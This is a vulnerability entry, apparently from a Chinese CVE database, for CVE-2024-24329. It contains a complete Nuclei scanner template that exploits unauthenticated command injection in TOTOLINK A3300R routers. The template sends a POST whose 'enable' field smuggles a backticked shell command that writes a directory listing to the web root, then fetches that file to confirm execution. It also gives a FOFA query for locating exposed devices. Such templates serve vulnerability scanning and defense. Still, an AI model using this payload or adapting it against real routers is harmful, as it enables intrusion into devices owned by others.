漏洞描述
TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setPortForwardRules function.
CVE-2024-24329: TotoLink Router setPortForwardRules - Command Injection
PoC代码[已公开]
id: CVE-2024-24329
info:
name: TotoLink Router setPortForwardRules - Command Injection
author: pussycat0x
severity: critical
description: |
TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setPortForwardRules function.
reference:
- https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/10/TOTOlink%20A3300R%20setPortForwardRules.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-24329
cwe-id: CWE-78
epss-score: 0.83293
epss-percentile: 0.99228
cpe: cpe:2.3:o:totolink:a3300r_firmware:17.0.0cu.557_b20221024:*:*:*:*:*:*:*
metadata:
vendor: totolink
product: a3300r_firmware
fofa-query: title="totolink"
tags: cve,cve2024,totolink,router,toto_link,unauth,intrusive,vkev
http:
- raw:
- |
POST /cgi-bin/cstecgi.cgi?token=C6F41C563E86A379 HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Origin: {{RootURL}}
Referer: {{RootURL}}/advance/portfwd.html?token=C6F41C563E86A379
{"enable":"1`ls>/web/{{randstr}}.txt`","addEffect":"0","topicurl":"setPortForwardRules"}
- |
GET /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
Referer: {{RootURL}}/advance/portfwd.html?token=C6F41C563E86A379
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && status_code_2 == 200'
- 'contains(body_1, "\"success\":true")'
- 'contains_all(body_2, "bin","etc")'
condition: and
# digest: 4a0a00473045022024acad1380823d4ee4e99a7eeb057bcc7074c9f744e9e6c8be308fad03a97472022100b5ffe23873627c2c6368ce0ea09af835b91be0a89b4016774977f0bcf252f4c5:922c64590222798bb761d5b6d8e72950